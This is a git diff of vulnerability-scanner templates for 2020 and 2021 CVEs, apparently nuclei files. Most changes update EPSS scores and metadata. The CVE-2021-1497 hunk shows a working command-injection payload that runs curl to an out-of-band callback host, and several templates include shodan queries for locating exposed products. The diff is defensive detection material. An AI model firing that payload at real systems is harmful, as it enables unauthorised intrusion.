b/http/cves/2020/CVE-2020-5410.yaml @@ -13,8 +13,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-5410 cwe-id: CWE-22,CWE-23 - epss-score: 0.97314 + epss-score: 0.9725 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* + epss-percentile: 0.99762 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 3d935f48a9..482fae983c 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -12,9 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-5412 - cwe-id: CWE-441,CWE-610 - epss-score: 0.04459 + cwe-id: CWE-610,CWE-441 + epss-score: 0.04418 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* + epss-percentile: 0.91325 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 40e60befbf..375502e5a7 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -13,8 +13,9 @@ info: cvss-score: 5.8 cve-id: CVE-2020-5775 cwe-id: CWE-918 - epss-score: 0.00189 + epss-score: 0.00194 cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* + epss-percentile: 0.56373 metadata: max-request: 1 vendor: instructure diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 9adacd41fb..59fcded45a 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -13,8 +13,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5776 cwe-id: CWE-352 - epss-score: 0.52762 + epss-score: 0.53597 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* + epss-percentile: 0.97163 metadata: max-request: 3 shodan-query: http.component:"Magento" diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 64401c02cf..6d1080c38a 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5777 cwe-id: CWE-287 - epss-score: 0.02505 + epss-score: 0.02378 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* + epss-percentile: 0.88457 metadata: max-request: 1 shodan-query: http.component:"Magento" diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index 4c5484e9c1..b69e676937 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5847 cwe-id: CWE-94,CWE-668 - epss-score: 0.97138 + epss-score: 0.97113 cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* + epss-percentile: 0.99678 metadata: max-request: 1 vendor: unraid diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 40d633ad19..8efac8bf5c 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -25,6 +25,7 @@ info: cwe-id: CWE-22 epss-score: 0.97566 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.99997 metadata: max-request: 8 vendor: f5 diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 80422868f3..2d16470a9f 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* + epss-percentile: 0.47998 metadata: max-request: 1 vendor: communilink diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index ec8b9bd9b9..6f6f2e1060 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-306 epss-score: 0.97442 cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* + epss-percentile: 0.99915 metadata: max-request: 1 vendor: sap diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index e7bfabaf49..b956a590ce 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-306 epss-score: 0.97519 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* + epss-percentile: 0.99976 metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index db1121709f..3b6cc52b29 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-918 epss-score: 0.00306 cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* + epss-percentile: 0.66005 metadata: max-request: 1 vendor: sap diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 76bac71852..66cc36f259 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6637 cwe-id: CWE-89 - epss-score: 0.01772 + epss-score: 0.02003 cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* + epss-percentile: 0.87406 metadata: max-request: 3 shodan-query: http.title:"openSIS" diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 4b3c649122..db6a508523 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-79 epss-score: 0.00517 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.73771 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 6ba9dd0441..4bc9b9959b 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7136 cwe-id: CWE-288 - epss-score: 0.05173 + epss-score: 0.16449 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.95315 metadata: max-request: 2 vendor: hpe diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index ffe2093953..d687a8b27d 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -17,8 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 - epss-score: 0.97134 + epss-score: 0.97202 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* + epss-percentile: 0.99729 metadata: max-request: 1 vendor: hp diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index caf9611350..f850693cbd 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00051 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* + epss-percentile: 0.17698 metadata: max-request: 1 vendor: mcafee diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index a6e7b26f7f..e527f1a365 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7796 cwe-id: CWE-918 - epss-score: 0.74825 + epss-score: 0.72496 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* + epss-percentile: 0.97646 metadata: max-request: 1 vendor: synacor diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index 08e90624ea..ee86c9457d 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-7943 cwe-id: CWE-276 - epss-score: 0.05993 + epss-score: 0.08018 cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* + epss-percentile: 0.93448 metadata: max-request: 1 vendor: puppet diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 88b5139d38..b7f1784b08 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7961 cwe-id: CWE-502 - epss-score: 0.97475 + epss-score: 0.97467 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* + epss-percentile: 0.99937 metadata: max-request: 2 vendor: liferay diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 9fe5b2640c..3f709a6116 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - epss-score: 0.97201 + epss-score: 0.96908 cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* + epss-percentile: 0.99589 metadata: max-request: 1 shodan-query: http.title:"Intellian Aptus Web" diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index fdc4a90771..ece29df375 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.0187 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* + epss-percentile: 0.86916 metadata: max-request: 1 vendor: revive-adserver diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index bcfcb49256..f3930e5047 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 - epss-score: 0.96961 + epss-score: 0.96847 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* + epss-percentile: 0.99557 metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index cc484cf49d..6c815e1981 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0021 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.58213 metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 72772deb55..32d7004b9a 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8193 cwe-id: CWE-287,CWE-284 - epss-score: 0.97455 + epss-score: 0.97454 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99926 metadata: max-request: 6 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 7371960f70..6446a49d2f 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.5 cve-id: CVE-2020-8194 cwe-id: CWE-94 - epss-score: 0.97325 + epss-score: 0.97341 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99825 metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 10d054518e..0c5076f287 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.97223 cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:* + epss-percentile: 0.99746 metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index a7d9fe9be5..961c836fcd 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-306 epss-score: 0.002 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* + epss-percentile: 0.57104 metadata: max-request: 1 vendor: artica diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 50114ba1ca..0a354688bf 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.0046 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* + epss-percentile: 0.72232 metadata: max-request: 1 shodan-query: title:"icewarp" diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index b210dcc95d..f15e61e80d 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8515 cwe-id: CWE-78 - epss-score: 0.97183 + epss-score: 0.97144 cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:* + epss-percentile: 0.99693 metadata: max-request: 1 vendor: draytek diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index 700abb019a..953dada9d5 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -14,8 +14,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8641 cwe-id: CWE-22 - epss-score: 0.00709 + epss-score: 0.00796 cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* + epss-percentile: 0.7943 metadata: max-request: 1 vendor: lotus_core_cms_project diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 900d1f3a5a..9aea9ac5f6 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-8644 cwe-id: CWE-94 - epss-score: 0.95246 + epss-score: 0.95415 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* + epss-percentile: 0.99099 metadata: max-request: 2 vendor: playsms diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index a5b3338a31..6feed9f0b2 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8654 cwe-id: CWE-78 - epss-score: 0.06956 + epss-score: 0.06605 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* + epss-percentile: 0.92868 metadata: max-request: 1 vendor: eyesofnetwork diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index d6d6fcf5e7..10fd871600 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-287 epss-score: 0.06142 cpe: cpe:2.3:a:wptimecapsule:wp_time_capsule:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.92596 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index a99a30f7d6..a660c62ec4 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-862 epss-score: 0.96852 cpe: cpe:2.3:a:revmakx:infinitewp_client:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9956 metadata: max-request: 2 verified: true diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index b2b8830eeb..25cdeffd9b 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8813 cwe-id: CWE-78 - epss-score: 0.96233 + epss-score: 0.96358 cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* + epss-percentile: 0.99352 metadata: max-request: 1 vendor: cacti diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index ba140a5f9b..0c45fb4b53 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-8982 cwe-id: CWE-22 - epss-score: 0.68883 + epss-score: 0.80263 cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* + epss-percentile: 0.97886 metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index e52dde8a6b..1b7f6ecceb 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00113 cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* + epss-percentile: 0.44064 metadata: max-request: 1 vendor: jeedom diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index 3a9dbce086..f65a4be134 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-9043 cwe-id: CWE-200 - epss-score: 0.03474 + epss-score: 0.04173 cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.91091 metadata: max-request: 4 verified: true diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index f5c4057aa7..f92e7f7b29 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.2 cve-id: CVE-2020-9047 cwe-id: CWE-347 - epss-score: 0.01324 + epss-score: 0.01182 cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.83293 metadata: max-request: 1 vendor: johnsoncontrols diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index dabe7e9566..5ce0e5d7c7 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9054 cwe-id: CWE-78 - epss-score: 0.97373 + epss-score: 0.97346 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99831 metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index 69927a61b9..ec0806dd66 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-306 epss-score: 0.97417 cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:* + epss-percentile: 0.99889 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 31d793a0a0..e13009bbcf 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -15,12 +15,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-9344 cwe-id: CWE-79 - cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* epss-score: 0.00205 + cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* + epss-percentile: 0.57744 metadata: max-request: 5 verified: true shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: subversion_application_lifecycle_management tags: cve,cve2020,atlassian,jira,xss http: @@ -50,4 +53,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index f709cb489c..38c375ceb1 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-74 epss-score: 0.9701 cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99626 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 86757fef04..e0c29211b9 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-9402 cwe-id: CWE-89 - epss-score: 0.24943 + epss-score: 0.31262 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* + epss-percentile: 0.96404 metadata: max-request: 1 vendor: djangoproject diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index faed206423..8a6b69ecb2 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-9425 cwe-id: CWE-670 - epss-score: 0.01597 + epss-score: 0.01611 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* + epss-percentile: 0.85844 metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 6db2244023..060f52fddf 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-9483 cwe-id: CWE-89 - epss-score: 0.06219 + epss-score: 0.05987 cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* + epss-percentile: 0.92516 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index 3bf98ada89..8609d28b04 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -22,8 +22,9 @@ info: cvss-score: 7 cve-id: CVE-2020-9484 cwe-id: CWE-502 - epss-score: 0.96967 + epss-score: 0.97119 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* + epss-percentile: 0.9968 metadata: max-request: 1 shodan-query: title:"Apache Tomcat" diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index f8117c4c27..7368c19433 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2020-9496 cwe-id: CWE-502 - epss-score: 0.97505 + epss-score: 0.975 cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:* + epss-percentile: 0.99963 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 919a4e7260..0d11179600 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-9757 cwe-id: CWE-74 - epss-score: 0.97362 + epss-score: 0.97161 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.99705 metadata: max-request: 2 vendor: craftcms diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index fa31156404..c0db99bccf 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-1472 - cwe-id: CWE-287,CWE-119 - epss-score: 0.97207 + cwe-id: CWE-119,CWE-287 + epss-score: 0.97285 cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99783 metadata: max-request: 1 shodan-query: http.html:"Cisco rv340" diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index 091d68da54..b4ca3538a3 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -20,12 +20,12 @@ info: cwe-id: CWE-78 epss-score: 0.97531 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\(2a\):*:*:*:*:*:*:* + epss-percentile: 0.99984 metadata: max-request: 2 vendor: cisco product: hyperflex_hx_data_platform tags: cve,cve2021,cisco,rce,oast,kev,packetstorm - variables: cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"' payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("' diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 50aaf42700..b3df34df0e 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-78 epss-score: 0.97531 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* + epss-percentile: 0.99984 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 3e9257fd2d..5bee672311 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-306 epss-score: 0.97246 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* + epss-percentile: 0.99761 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 21af5167f2..db89a1998e 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.01202 cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* + epss-percentile: 0.83464 metadata: max-request: 1 google-query: inurl:"auth.html" intitle:"SonicWall" diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index d2f6e66805..2e4bae8912 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-20038 cwe-id: CWE-787,CWE-121 - epss-score: 0.95255 + epss-score: 0.96076 cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:* + epss-percentile: 0.99265 metadata: max-request: 2 vendor: sonicwall diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index 8c724d6aa2..11b4a2f593 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ 